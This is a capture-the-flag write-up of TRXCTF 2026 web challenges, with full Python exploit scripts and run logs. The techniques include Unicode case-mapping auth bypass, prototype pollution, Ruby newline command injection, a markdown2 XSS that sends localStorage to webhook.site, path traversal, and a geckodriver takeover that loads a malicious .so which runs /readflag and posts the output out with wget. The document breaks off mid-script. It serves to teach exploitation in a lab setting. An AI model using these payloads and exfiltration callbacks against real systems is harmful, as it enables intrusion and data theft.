TRX2026

Borrowed from n1's writeup.

StifflingFluffiness

The admin check in the source is:

req.session.isAdmin=username.toUpperCase()===ADMIN_USERNAME.toUpperCase();

But the username length restriction is:

username.length>=4&&username.length<=12

The real admin username is:

StifflingFluffiness

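It is 19 characters long, so no ordinary input can pass the length check. However, JavaScript's toUpperCase() expands certain Unicode ligatures and special letters into multiple ASCII letters, for example: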

ﬆ  -> ST
ﬄ  -> FFL
ﬂ  -> FL
ﬃ  -> FFI
ß  -> SS

So a username of exactly 12 characters can be constructed:

ﬆiﬄingﬂuﬃneß
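The expansion can be sanity-checked offline. The sketch below uses Python rather than JavaScript, on the assumption that Python's str.upper() applies the same full Unicode case mapping to these characters; the payload is written with escapes so the ligatures survive copy and paste.

```python
# The 12-character payload: U+FB06 i U+FB04 i n g U+FB02 u U+FB03 n e U+00DF
payload = "\ufb06i\ufb04ing\ufb02u\ufb03ne\u00df"
ADMIN_USERNAME = "StifflingFluffiness"

# Length as seen by the 4..12 check (all characters are in the BMP,
# so the count matches JavaScript's .length).
print(len(payload))

# Full case mapping expands each ligature into plain ASCII letters.
print(payload.upper())

assert 4 <= len(payload) <= 12
assert payload.upper() == ADMIN_USERNAME.upper()
```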

TRX{m4yb3_my_fluffy_bl0g_n33d3d_b3773r_s3curi7y}

Junkiness

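The server parses forms with express.urlencoded({ extended: true }), so nested fields in the request body are parsed into arrays or objects. The registration endpoint only restricts the length and characters of username: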

if (username.length > 8) {
    return res.status(400).json({ message: "Username must not be longer than 8 characters." });
}

if (/\W/.test(username)) {
    return res.status(400).json({ message: "Username must be an alphanumeric string." });
}

users[username] = { username, password, isAdmin: false };

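username[]=__proto__ is parsed into the array ["__proto__"]. The array's length is 1, and the regex test coerces it to the string __proto__, which passes the filter. When users[username] is written, the array used as a property key is coerced to a string as well, so the statement becomes an assignment to users["__proto__"], which replaces the prototype of the users object.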

At registration, make password an object:

username[]=__proto__&password[password]=p&password[isAdmin]=true

After registration, the prototype of users is:

{
  username: ["__proto__"],
  password: {
    password: "p",
    isAdmin: "true"
  },
  isAdmin: false
}

The login endpoint then runs:

const user = users[username];

if (user.password !== password) {
    return res.status(401).json({ message: "Invalid password." });
}

req.session.user = user;

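When logging in with username=password&password=p, users["password"] resolves through the prototype to the object { password: "p", isAdmin: "true" }. After the password check passes, this object is stored in the session. When /flag is requested, req.session.user.isAdmin is truthy, and the server returns the flag.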
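The lookup chain can be modelled outside Node. The following is a toy Python model, not the challenge code: JSObject and make are hypothetical helpers that imitate only the two JavaScript behaviours used here (assigning an object to "__proto__" swaps the prototype, and property reads fall back to the prototype).

```python
class JSObject:
    """Toy stand-in for a JavaScript object: own properties plus a prototype link."""

    def __init__(self, proto=None):
        self.own = {}
        self.proto = proto

    def set(self, key, value):
        # Assigning an object to "__proto__" replaces the prototype instead of
        # creating an own property, as users["__proto__"] = {...} does in JS.
        if key == "__proto__" and isinstance(value, JSObject):
            self.proto = value
        else:
            self.own[key] = value

    def get(self, key):
        # Walk own properties first, then the prototype chain.
        obj = self
        while obj is not None:
            if key in obj.own:
                return obj.own[key]
            obj = obj.proto
        return None  # models JavaScript's undefined


def make(props):
    obj = JSObject()
    for k, v in props.items():
        obj.set(k, v)
    return obj


users = JSObject()

# Registration: username[]=__proto__&password[password]=p&password[isAdmin]=true
record = make({
    "username": ["__proto__"],
    "password": make({"password": "p", "isAdmin": "true"}),
    "isAdmin": False,
})
users.set("__proto__", record)  # the array key coerces to the string "__proto__"

# Login: username=password&password=p
user = users.get("password")            # found on the prototype, not on users
assert user.get("password") == "p"      # password check passes
is_admin = bool(user.get("isAdmin"))    # the string "true" is truthy
print(is_admin)
```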

exp

#!/usr/bin/env python3
import http.cookiejar
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

def request(opener, method, url, body=None, content_type=None):
    data = None
    headers = {}
    if body is not None:
        data = body.encode()
        headers["Content-Type"] = content_type or "application/x-www-form-urlencoded"

    req = urllib.request.Request(url, data=data, headers=headers, method=method)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()

def main():
    base = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:3000"
    base = base.rstrip("/")

    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

    register_body = "username[]=__proto__&password[password]=p&password[isAdmin]=true"
    status, text = request(opener, "POST", base + "/register", register_body)
    print(f"[+] register: {status} {text}")
    if status not in (200, 201, 409):
        raise SystemExit("registration step failed")

    login_body = urllib.parse.urlencode({"username": "password", "password": "p"})
    status, text = request(opener, "POST", base + "/login", login_body)
    print(f"[+] login: {status} {text}")
    if status != 200:
        raise SystemExit("login step failed")

    status, text = request(opener, "GET", base + "/flag")
    print(f"[+] flag: {status} {text}")
    if status != 200:
        raise SystemExit("flag request failed")

    try:
        value = json.loads(text)
        if isinstance(value, dict):
            value = value.get("flag", value)
        print(value)
    except json.JSONDecodeError:
        print(text)

if __name__ == "__main__":
    main()
 
#[+] register: 201 {"message":"User registered successfully."}

#[+] login: 200 {"message":"Login successful."}

#[+] flag: 200 "TRX{j4v4scrip7_c4n_b3_j4nky_s0m37im3s}"

Who Is He

The application is a Sinatra Whois lookup service. The core logic is:

post '/lookup' do
  @domain = params[:domain]
  if @domain && @domain.match?(/^[a-z.-]+$/)
    stdout, stderr, status = Open3.capture3("whois #{@domain}")
    @result = stdout.empty? ? stderr : stdout
    @success = status.success?
  else
    @error = "Invalid domain format"
  end
  erb :result
end

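The filter appears to allow only lowercase letters, dots, and hyphens, but in Ruby regexes ^ and $ are line anchors. As long as one line of the parameter satisfies ^[a-z.-]+$, match? returns true. The first line can therefore be disguised as valid input, with shell commands injected after a newline.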
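The anchor behaviour is easy to reproduce. The sketch below uses Python's re module as a stand-in for Ruby: re.MULTILINE gives ^ and $ the line-based meaning they always have in Ruby, while re.fullmatch is roughly what a whole-string check (Ruby's \A and \z) would do.

```python
import re

payload = '--version\n/readflag "could you please give me the flag thank you so much"'

# Line anchors: a single valid line anywhere in the input is enough to match.
line_anchored = re.search(r"^[a-z.-]+$", payload, re.MULTILINE)

# Whole-string anchoring: the newline and everything after it must match too.
string_anchored = re.fullmatch(r"[a-z.-]+", payload)

print(line_anchored.group(0))
print(string_anchored)
```

Only the line-anchored check accepts the payload, which is why the injected second line reaches the shell.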

The image also contains a setuid program that reads the flag. It requires a fixed argument:

strcmp(argv[1], "could you please give me the flag thank you so much")

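To make the first command finish quickly and reliably, the valid line can be --version, which gets interpolated as whois --version. The second command, after the newline, runs the flag reader: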

--version
/readflag "could you please give me the flag thank you so much"

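When sending to the endpoint, the form field domain carries the newline payload above. The server regex matches the first line, --version, and Open3.capture3("whois #{payload}") then runs it as a command string, so the shell executes whois --version and /readflag "could you please give me the flag thank you so much" in turn.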

exp

#!/usr/bin/env python3
import argparse
import html
import re
import sys
import urllib.parse
import urllib.request

PAYLOAD = '--version\n/readflag "could you please give me the flag thank you so much"'

def exploit(base_url: str) -> str:
    base_url = base_url.rstrip("/")
    data = urllib.parse.urlencode({"domain": PAYLOAD}).encode()
    request = urllib.request.Request(
        f"{base_url}/lookup",
        data=data,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )

    with urllib.request.urlopen(request, timeout=10) as response:
        body = response.read().decode("utf-8", errors="replace")

    body = html.unescape(body)
    match = re.search(r"TRX\{[^}\r\n]+\}", body)
    if not match:
        raise RuntimeError("flag not found in response:\n" + body)
    return match.group(0)

def main() -> int:
    parser = argparse.ArgumentParser(description="Exploit WHOISHE command injection")
    parser.add_argument("url", nargs="?", default="http://127.0.0.1:1337")
    args = parser.parse_args()

    print(exploit(args.url))
    return 0

if __name__ == "__main__":
    sys.exit(main())

TRX{wh4t_d03s_h3_d0????}

markdown2

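The challenge has the bot first visit http://localhost:1337 and write the flag into that origin's localStorage.flag, then visit the URL submitted to /report. The goal is to execute script on a http://localhost:1337 page, read localStorage.flag, and redirect to a collection address.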

The server-side rendering logic is:

safe_md = bleach.clean(
    md,
    tags=[],
    attributes={},
    protocols=[],
    strip=True,
    strip_comments=True,
)

html = Markup(markdown2.markdown(safe_md, safe_mode="escape"))

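The input goes through bleach first and is then passed to markdown2 for conversion to HTML. bleach can only handle HTML tags already present in the input; new tags produced from Markdown syntax are markdown2's own responsibility to sanitize.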

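In safe mode, markdown2 temporarily protects code spans, URLs, and similar content with placeholders of the form md5-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx. The hash is generated with a per-process random salt, so within one process the same content always maps to the same hash. A code span inside an image alt text leaks this internal hash: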

![`" onerror=location=String.fromCharCode(...)+encodeURIComponent(localStorage.flag)//`](x)

The returned HTML contains something like:

<img src="x" alt="&lt;code&gt;md5-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&lt;/code&gt;" />

With the hash in hand, the second request puts the image first and the same code span after it:

![](md5-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)

`" onerror=location=String.fromCharCode(...)+encodeURIComponent(localStorage.flag)//`

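The image URL is first treated as an ordinary string. The later code span then adds the same hash to markdown2's code table. When placeholders are finally resolved, the image's src value is restored to the original code span, producing a real event attribute: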

<img src="" onerror=location=String.fromCharCode(...)+encodeURIComponent(localStorage.flag)//" alt="" />
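The collision can be illustrated with a toy model. This is not markdown2's actual code: SALT, table, protect, and unprotect are hypothetical names, and PAYLOAD stands in for the real JavaScript. The only properties assumed are the ones described above, namely that the placeholder is a salted MD5 of the protected text and that a final pass replaces every known placeholder wherever it appears.

```python
import hashlib

SALT = b"per-process-salt"  # hypothetical; the real salt is random per process
table = {}                  # placeholder -> protected text


def protect(text: str) -> str:
    """Swap text for a salted-MD5 placeholder and remember the mapping."""
    key = "md5-" + hashlib.md5(SALT + text.encode()).hexdigest()
    table[key] = text
    return key


def unprotect(html: str) -> str:
    """Final pass: restore every known placeholder, wherever it occurs."""
    for key, text in table.items():
        html = html.replace(key, text)
    return html


code = '" onerror=PAYLOAD//'

# Stage 1: the placeholder is deterministic within a process, so it can be leaked.
leaked = "md5-" + hashlib.md5(SALT + code.encode()).hexdigest()

# Stage 2: the image URL is the leaked placeholder, typed in as literal text...
img = f'<img src="{leaked}" alt="" />'
# ...and the later code span registers that same placeholder in the table.
span = "<code>" + protect(code) + "</code>"

print(unprotect(img + "\n" + span))
```

The restored text lands inside the src attribute unescaped, so the quote closes the attribute and onerror becomes a real handler.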

The page CSP's default-src 'none' blocks the image load, so the browser fires the error event; script-src 'self' 'unsafe-inline' allows inline event handlers, so onerror can read localStorage.flag and redirect to the collection address.

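For remote exploitation, the first-stage hash leak can go through the public challenge domain. The URL submitted to /report in the second stage must use the same-origin address inside the bot container:

http://localhost:1337/?markdown=<second-stage payload>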

exp:

import argparse
import re
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import quote

import requests

captured = []

class Collector(BaseHTTPRequestHandler):
    def log_message(self, fmt, *args):
        return

    def do_GET(self):
        captured.append(self.path)
        self.send_response(204)
        self.end_headers()

def normalize_base(url: str) -> str:
    return url.rstrip("/") + "/"

def js_for_callback(callback_prefix: str) -> str:
    codes = ",".join(str(ord(ch)) for ch in callback_prefix)
    return (
        f"location=String.fromCharCode({codes})+"
        "encodeURIComponent(localStorage.flag)//"
    )

def make_code(callback_prefix: str) -> str:
    return '" onerror=' + js_for_callback(callback_prefix)

def make_leak_payload(callback_prefix: str) -> str:
    code = make_code(callback_prefix)
    return f"![`{code}`](x)"

def make_exploit_payload(leaked_hash: str, callback_prefix: str) -> str:
    code = make_code(callback_prefix)
    return f"![]({leaked_hash})\n\n`{code}`"

def leak_hash(target: str, callback_prefix: str) -> str:
    base = normalize_base(target)
    payload = make_leak_payload(callback_prefix)
    resp = requests.get(base + "?markdown=" + quote(payload, safe=""), timeout=15)
    resp.raise_for_status()
    match = re.search(r"md5-[0-9a-f]{32}", resp.text)
    if not match:
        raise RuntimeError("failed to leak markdown2 hash")
    return match.group(0)

def submit_report(target: str, victim_base: str, payload: str) -> str:
    report_url = normalize_base(target) + "report"
    victim_url = normalize_base(victim_base) + "?markdown=" + quote(payload, safe="")
    resp = requests.post(report_url, data={"url": victim_url}, timeout=15)
    resp.raise_for_status()
    print(f"[+] victim url: {victim_url}")
    print(f"[+] report response: {resp.text}")
    return victim_url

def create_webhook_site_token() -> str:
    resp = requests.post("https://webhook.site/token", timeout=15)
    resp.raise_for_status()
    return resp.json()["uuid"]

def poll_webhook_site(token: str, timeout: int) -> str | None:
    api = f"https://webhook.site/token/{token}/requests"
    deadline = time.time() + timeout
    while time.time() < deadline:
        time.sleep(1)
        resp = requests.get(api, timeout=15)
        resp.raise_for_status()
        data = resp.json().get("data", [])
        for item in data:
            query = item.get("query") or {}
            if "flag" in query:
                return query["flag"]
            url = item.get("url") or ""
            if "flag=" in url:
                return url.split("flag=", 1)[1]
    return None

def main() -> None:
    parser = argparse.ArgumentParser(description="TRXCTF markdown2 exploit")
    parser.add_argument("target", help="public challenge base URL")
    parser.add_argument(
        "--victim-base",
        default="http://localhost:1337",
        help="URL visited by the bot; keep localhost for the remote challenge",
    )
    parser.add_argument("--callback", help="public callback prefix ending before the flag")
    parser.add_argument("--webhook-site", action="store_true", help="create and poll a webhook.site callback")
    parser.add_argument("--listen", action="store_true", help="start a local collector for local testing")
    parser.add_argument("--listen-host", default="0.0.0.0")
    parser.add_argument("--listen-port", type=int, default=8000)
    parser.add_argument("--timeout", type=int, default=20)
    args = parser.parse_args()

    server = None
    token = None

    if args.webhook_site:
        token = create_webhook_site_token()
        callback = f"https://webhook.site/{token}/?flag="
        print(f"[+] webhook: {callback}")
    elif args.callback:
        callback = args.callback
    elif args.listen:
        callback = f"http://127.0.0.1:{args.listen_port}/collect?flag="
    else:
        raise SystemExit("provide --webhook-site, --callback, or --listen")

    if args.listen:
        server = ThreadingHTTPServer((args.listen_host, args.listen_port), Collector)
        threading.Thread(target=server.serve_forever, daemon=True).start()

    leaked = leak_hash(args.target, callback)
    print(f"[+] leaked hash: {leaked}")

    payload = make_exploit_payload(leaked, callback)
    submit_report(args.target, args.victim_base, payload)

    if token:
        flag = poll_webhook_site(token, args.timeout)
        print(f"[+] flag: {flag}" if flag else "[-] no webhook callback received")

    if args.listen:
        deadline = time.time() + args.timeout
        while time.time() < deadline and not captured:
            time.sleep(0.2)
        print(f"[+] callback: {captured[0]}" if captured else "[-] no local callback received")
        server.shutdown()

if __name__ == "__main__":
    main()

# [+] webhook: https://webhook.site/b947bedb-4273-4f16-ae0c-d19aacb8207b/?flag=
# [+] leaked hash: md5-3aaa0de9027a6884f27e62b5cc2346a3
# [+] victim url: http://localhost:1337/?markdown=%21%5B%5D%28md5-3aaa0de9027a6884f27e62b5cc2346a3%29%0A%0A%60%22%20onerror%3Dlocation%3DString.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C101%2C98%2C104%2C111%2C111%2C107%2C46%2C115%2C105%2C116%2C101%2C47%2C98%2C57%2C52%2C55%2C98%2C101%2C100%2C98%2C45%2C52%2C50%2C55%2C51%2C45%2C52%2C102%2C49%2C54%2C45%2C97%2C101%2C48%2C99%2C45%2C100%2C49%2C57%2C97%2C97%2C99%2C98%2C56%2C50%2C48%2C55%2C98%2C47%2C63%2C102%2C108%2C97%2C103%2C61%29%2BencodeURIComponent%28localStorage.flag%29%2F%2F%60
# [+] report response: {"result":"Visiting..."}

# [+] flag: TRX{n0t_s0_s4f3_m0d3_dwiudwahyudyusaidwqjn}

short-notes

The server implements its own query string parser:

function parseQuery(qs = '') {
  const out = {};
  for (const pair of qs.split('&')) {
    if (!pair) continue;
    let [k, v = ''] = pair.split('=');
    k = decodeURIComponent(k.replace(/\+/g, ' '));
    v = decodeURIComponent(v.replace(/\+/g, ' '));
    const parts = k.split(/\[|\]/).filter(Boolean);
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      cur = cur[parts[i]] = cur[parts[i]] || {};
    }
    cur[parts.at(-1)] = v;
  }
  return out;
}

This code does not filter __proto__, so properties can be written into Object.prototype.
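To see which path the parser walks, the key splitting can be mirrored in a few lines. This is a sketch of the splitting step only, with key_parts as a hypothetical helper name; Python dictionaries have no prototype, so the pollution itself is not reproduced.

```python
import re
from urllib.parse import unquote


def key_parts(raw_key: str) -> list[str]:
    # Mirrors the parser: '+' becomes a space, percent-decoding is applied,
    # then the key is split on '[' or ']' and empty pieces are dropped.
    key = unquote(raw_key.replace("+", " "))
    return [part for part in re.split(r"\[|\]", key) if part]


for raw in ("__proto__[lookupCompressed]", "__proto__[lookupMap][identity]"):
    print(key_parts(raw))
```

Because the first segment is __proto__, the JavaScript loop descends into Object.prototype before assigning the final segment.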

The note title is only checked for type and length; ./ sequences are not filtered:

const validateTitle = t => {
  if (!t)
    throw new Error('Title required');
  if (typeof t !== 'string')
    throw new Error('Title must be a string');
  if (t.length > 8)
    throw new Error('Title too long (max 8 chars)');
  return t;
};

Both creating and reading a note join the title directly onto the temporary directory:

const file = t => path.join(STORE, t);

../../se is exactly 8 characters, so it passes validation and also escapes from the temporary directory to the root, ending up as /se.
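A quick check of the traversal, using Python's posixpath as a stand-in for Node's path.join (both normalize .. segments). The value of STORE is an assumption: the writeup does not give it, and any directory two levels below / behaves the same way.

```python
import posixpath

STORE = "/tmp/notes"  # hypothetical; only the depth (two levels) matters
title = "../../se"

# Passes the validateTitle length limit of 8 characters.
assert len(title) <= 8

# Equivalent of path.join(STORE, title): join, then collapse the '..' segments.
resolved = posixpath.normpath(posixpath.join(STORE, title))
print(resolved)
```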

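Reading a note goes through h.file(), which is backed by @hapi/inert. If lookupCompressed is truthy and lookupMap has a suffix for the current encoding, Inert appends that suffix directly to the original path and reopens the file: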

if (settings.lookupCompressed &&
    !settings.start &&
    settings.end === undefined &&
    request.server.settings.compression !== false) {

    const lookupMap = settings.lookupMap ?? internals.defaultMap;
    const encoding = request.info.acceptEncoding;
    const extension = lookupMap.hasOwnProperty(encoding) ? lookupMap[encoding] : null;
    if (extension) {
        const precompressed = new Fs.File(`${source.path}${extension}`);
        var stat = await precompressed.openStat('r');
        ...
    }
}

The key point is that both settings.lookupCompressed and settings.lookupMap are resolved through the prototype chain. So we can first pollute:

Object.prototype.lookupCompressed = 1
Object.prototype.lookupMap.identity = 'crets/super_secret_flag.txt'

Then, when the original path is /se and the request carries Accept-Encoding: identity, Inert ends up opening:

/se + crets/super_secret_flag.txt
= /secrets/super_secret_flag.txt
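The effect of the pollution on the lookup can be modelled with collections.ChainMap, which checks an object's own keys first and then falls back to a parent, much like a prototype chain. This is a simplified sketch: precompressed_path is a hypothetical name, the range checks from the Inert snippet are omitted, and the default map is left empty for brevity.

```python
from collections import ChainMap

object_prototype = {}                      # stands in for Object.prototype
settings = ChainMap({}, object_prototype)  # own route options first, then the prototype


def precompressed_path(source_path: str, accept_encoding: str):
    """Return the path opened for a precompressed variant, or None."""
    if not settings.get("lookupCompressed"):
        return None
    extension = settings.get("lookupMap", {}).get(accept_encoding)
    # The suffix is appended to the path with no separator and no validation.
    return source_path + extension if extension else None


before = precompressed_path("/se", "identity")

# Effect of the two polluting query parameters.
object_prototype["lookupCompressed"] = "1"
object_prototype["lookupMap"] = {"identity": "crets/super_secret_flag.txt"}

after = precompressed_path("/se", "identity")
print(before, after)
```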

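Exploitation steps

  1. Create a note titled ../../se so the server creates an anchor file /se in the root directory.
  2. Use the query-string prototype pollution to write lookupCompressed and lookupMap.identity into Object.prototype.
  3. Request /note/%2E%2E%2F%2E%2E%2Fse with Accept-Encoding: identity so Inert resolves the concatenated path to the real flag.

The corresponding requests are: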

POST /notes HTTP/1.1
Content-Type: application/json

{"title":"../../se","content":"anchor"}

GET /?__proto__[lookupCompressed]=1&__proto__[lookupMap][identity]=crets%2Fsuper_secret_flag.txt HTTP/1.1

GET /note/%2E%2E%2F%2E%2E%2Fse HTTP/1.1
Accept-Encoding: identity

Exp

#!/usr/bin/env python3

import argparse
import sys

import requests

ANCHOR_TITLE = "../../se"
ANCHOR_CONTENT = "anchor"
ENCODED_ANCHOR = "%2E%2E%2F%2E%2E%2Fse"
POLLUTION_PATH = "/?__proto__[lookupCompressed]=1&__proto__[lookupMap][identity]=crets%2Fsuper_secret_flag.txt"

def fail(message: str) -> int:
    print(f"[!] {message}", file=sys.stderr)
    return 1

def main() -> int:
    parser = argparse.ArgumentParser(description="Exploit for TRXCTF Short Notes")
    parser.add_argument(
        "base_url",
        nargs="?",
        default="http://66020310f456.short-notes.ctf.theromanxpl0.it",
        help="Target base URL, for example http://127.0.0.1:3000",
    )
    args = parser.parse_args()
    base_url = args.base_url.rstrip("/")

    session = requests.Session()
    timeout = 10

    create = session.post(
        f"{base_url}/notes",
        json={"title": ANCHOR_TITLE, "content": ANCHOR_CONTENT},
        timeout=timeout,
    )
    if create.status_code not in (201, 409):
        return fail(f"anchor creation failed: {create.status_code} {create.text}")
    print(f"[+] anchor ready with status {create.status_code}")

    pollute = session.get(f"{base_url}{POLLUTION_PATH}", timeout=timeout)
    if pollute.status_code != 200:
        return fail(f"prototype pollution request failed: {pollute.status_code} {pollute.text}")
    print("[+] prototype polluted")

    leak = session.get(
        f"{base_url}/note/{ENCODED_ANCHOR}",
        headers={"Accept-Encoding": "identity"},
        timeout=timeout,
    )
    if leak.status_code != 200:
        return fail(f"flag read failed: {leak.status_code} {leak.text}")

    body = leak.text.strip()
    print("[+] response body:")
    print(body)
    return 0

if __name__ == "__main__":
    raise SystemExit(main())

# PS D:\CTF\2026 0425-0427 TRXCTF\web-short-notes> & D:/Env/Python311/python.exe "d:/CTF/2026 0425-0427 TRXCTF/web-short-notes/result/Exp/exploit.py"
# [+] anchor ready with status 201
# [+] prototype polluted
# [+] response body:
# TRX{https://www.youtube.com/watch?v=OWbtxdq5rvQ}

geckodrce

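The service is a FastAPI bot whose only core endpoint is POST /visit. After a user uploads a Firefox extension package, the service saves it as a temporary XPI, starts headless Firefox, and temporarily installs the extension through geckodriver.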

@app.post("/visit")
async def visit(extension: UploadFile = File(...)):
    if not extension.filename:
        raise HTTPException(status_code=400, detail="No extension uploaded")

    with tempfile.TemporaryDirectory(prefix="bot_", dir="/tmp") as td:
        ext_path = Path(td) / "extension.xpi"
        await save_upload(extension, ext_path)
        await asyncio.to_thread(run_webdriver, str(ext_path))

    return {"status": "success"}

The Firefox preferences disable Wasm and the JITs, and the bot waits 60 seconds after installing the extension:

def run_webdriver(ext_path: str) -> None:
    opts = Options()
    opts.binary_location = "/usr/bin/firefox"
    opts.add_argument("-headless")
    opts.set_preference("javascript.options.wasm", False)
    opts.set_preference("javascript.options.baselinejit", False)
    opts.set_preference("javascript.options.ion", False)
    opts.set_preference("javascript.options.asmjs", False)

    service = Service(executable_path="/usr/bin/geckodriver")
    driver = webdriver.Firefox(options=opts, service=service)
    try:
        addon_id = driver.install_addon(ext_path, temporary=True)
        time.sleep(60)
        driver.uninstall_addon(addon_id)
    except Exception:
        pass
    finally:
        driver.quit()

The container has a SUID program /readflag that reads /flag.txt when invoked with the argument pls:

int main(int argc, char *argv[]) {
  if (argc != 2 || strcmp(argv[1], "pls") != 0) {
    write(1, "ask politely :(\n", 16);
    return 1;
  }

  int fd = open("/flag.txt", O_RDONLY);
  if (fd < 0) return 1;

  char buf[128];
  ssize_t n = read(fd, buf, sizeof(buf));
  if (n > 0) write(1, buf, (size_t)n);

  close(fd);
  return 0;
}

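The goal therefore becomes: get the uploaded extension to trigger local command execution inside the bot container, run /readflag pls, and exfiltrate the output.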

Exploit idea

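When Selenium launches Firefox it starts a local geckodriver service listening on 127.0.0.1:<random port>. The uploaded extension runs in that same Firefox and, with the <all_urls> permission, can reach HTTP services on the local machine.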

Requesting geckodriver's /status identifies the port:

{"value":{"message":"Session already started","ready":false}}

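After the current Selenium session ends, geckodriver briefly enters a state in which a new session can be created. The extension keeps sending the following to that port: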

POST /session

This lets it create a new Firefox session before anything else does.
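For offline experiments, the /status body can be classified with a small helper. This is a sketch under the assumption that the response follows the shape shown above, a JSON object with a value.ready boolean; classify_status is a hypothetical name and is not part of the exploit.

```python
import json


def classify_status(body: str) -> str:
    """Classify a /status response body as 'busy', 'ready', or 'unknown'."""
    try:
        value = json.loads(body).get("value", {})
    except (json.JSONDecodeError, AttributeError):
        # Not JSON, or JSON that is not an object: probably not a WebDriver port.
        return "unknown"
    if not isinstance(value, dict) or "ready" not in value:
        return "unknown"
    # ready == false means a session is active; the port is worth watching.
    return "ready" if value["ready"] else "busy"


sample = '{"value":{"message":"Session already started","ready":false}}'
print(classify_status(sample))
```

A port reporting busy is the one to keep hammering with POST /session until the original session ends.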

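Requests sent directly from the extension to geckodriver run into its Origin check. A Firefox WebExtension can use webRequestBlocking to modify request headers and strip Origin before the request goes out: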

browser.webRequest.onBeforeSendHeaders.addListener(
  details => ({
    requestHeaders: details.requestHeaders.filter(
      h => h.name.toLowerCase() !== "origin"
    )
  }),
  {urls: ["http://127.0.0.1/*", "http://localhost/*"]},
  ["blocking", "requestHeaders"]
);

A Firefox profile can be supplied when creating a session. The profile's pkcs11.txt specifies the PKCS#11 modules NSS should load:

library=
name=NSS Internal PKCS #11 Module
parameters=configdir='sql:.' certPrefix='' keyPrefix='' secmod='secmod.db' flags=readOnly
NSS=trustOrder=75 cipherOrder=100

library=/home/bot/Downloads/pwn.so
name=geckodrce
parameters=
NSS=trustOrder=100 cipherOrder=100

The extension first downloads its bundled pwn.so into the default downloads directory:

await browser.downloads.download({
  url: browser.runtime.getURL("pwn.so"),
  filename: "pwn.so",
  conflictAction: "overwrite",
  saveAs: false
});

It then creates a new session with the malicious profile:

const payload = JSON.stringify({
  capabilities: {
    alwaysMatch: {
      browserName: "firefox",
      "moz:firefoxOptions": {
        binary: "/usr/bin/firefox",
        args: ["-headless"],
        profile: PROFILE_B64
      }
    }
  }
});

fetch(`http://127.0.0.1:${port}/session`, {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  body: payload
});

On startup Firefox reads pkcs11.txt, NSS loads /home/bot/Downloads/pwn.so, and the shared library's constructor runs automatically:

__attribute__((constructor)) static void geckodrce_init(void) {
    if (getenv("GECKODRCE_DONE") != NULL) return;
    setenv("GECKODRCE_DONE", "1", 1);

    pid_t pid = fork();
    if (pid != 0) return;

    setsid();
    execl("/bin/sh", "sh", "-c",
          "flag=/tmp/geckodrce_flag; "
          "/readflag pls > \"$flag\" 2>/tmp/geckodrce_err; "
          "wget -q -O- --post-file=\"$flag\" CALLBACK >/dev/null 2>&1",
          (char *)0);
    _exit(0);
}

Race strategy

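In /visit the original Selenium session holds geckodriver and releases it only after about 60 seconds. A single extension can rarely win the race for its own geckodriver reliably, so the exploit uploads in multiple shards and multiple waves.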

Port shards:

30000-38750
38751-47500
47501-56250
56251-65000
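The four ranges above are an even split of ports 30000 to 65000. The writeup does not say how they were derived; the sketch below is one way to reproduce them, with split_ports as a hypothetical helper that gives any leftover ports to the earliest shards.

```python
def split_ports(lo: int, hi: int, shards: int) -> list[tuple[int, int]]:
    """Split the inclusive range lo..hi into contiguous, near-equal shards."""
    total = hi - lo + 1
    base, extra = divmod(total, shards)
    out, start = [], lo
    for i in range(shards):
        # The first `extra` shards take one additional port each.
        size = base + (1 if i < extra else 0)
        out.append((start, start + size - 1))
        start += size
    return out


print(",".join(f"{a}-{b}" for a, b in split_ports(30000, 65000, 4)))
```

The printed string has the same format as the DEFAULT_SHARDS constant in the exploit, so a different shard count can be tried by changing the last argument.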

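Each XPI scans one port range and, once /status hits, keeps sending /session to that port. The first wave of uploads creates geckodriver instances that can be taken over; the second wave is uploaded about 20 seconds later, so that by the time the first wave is about to exit it has finished scanning and is already racing. Once a session is won, the Firefox profile carrying pkcs11.txt loads the malicious .so, runs /readflag pls, and sends the flag to the callback address.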

exp:

#!/usr/bin/env python3
import argparse
import base64
import http.server
import io
import json
import os
import queue
import re
import shutil
import socketserver
import subprocess
import sys
import tempfile
import threading
import time
import urllib.parse
import urllib.request
import uuid
import zipfile
from pathlib import Path

DEFAULT_TARGET = "http://e5653b6f1fe2.geckodrce.ctf.theromanxpl0.it"
DEFAULT_SHARDS = "30000-38750,38751-47500,47501-56250,56251-65000"
DOWNLOAD_PATH = "/home/bot/Downloads/pwn.so"
MAX_XPI_SIZE = 1024 * 1024
FLAG_RE = re.compile(r"TRX\{[^}\r\n]*\}")

PWN_C_TEMPLATE = r"""
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) static void geckodrce_init(void) {
    if (getenv("GECKODRCE_DONE") != NULL) {
        return;
    }
    setenv("GECKODRCE_DONE", "1", 1);

    pid_t pid = fork();
    if (pid != 0) {
        return;
    }

    setsid();
    execl("/bin/sh", "sh", "-c", __COMMAND_LITERAL__, (char *)0);
    _exit(0);
}
"""

BACKGROUND_JS = r"""
const LO = __LO__;
const HI = __HI__;
const CONCURRENCY = __CONCURRENCY__;
const CALLBACK_URL = __CALLBACK_URL__;
const PROFILE_B64 = __PROFILE_B64__;

const payload = JSON.stringify({
  capabilities: {
    alwaysMatch: {
      browserName: "firefox",
      "moz:firefoxOptions": {
        binary: "/usr/bin/firefox",
        args: ["-headless"],
        profile: PROFILE_B64
      }
    }
  }
});

const candidates = new Set();
const watching = new Set();

function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms));
}

async function report(kind, data) {
  if (!CALLBACK_URL) return;
  const body = JSON.stringify({kind, data, shard: [LO, HI], when: Date.now()});
  try {
    await fetch(CALLBACK_URL, {
      method: "POST",
      headers: {"Content-Type": "application/json"},
      body
    });
  } catch (e) {
    try {
      await fetch(CALLBACK_URL + "?d=" + encodeURIComponent(body), {
        mode: "no-cors",
        cache: "no-store"
      });
    } catch (_) {}
  }
}

browser.webRequest.onBeforeSendHeaders.addListener(
  details => {
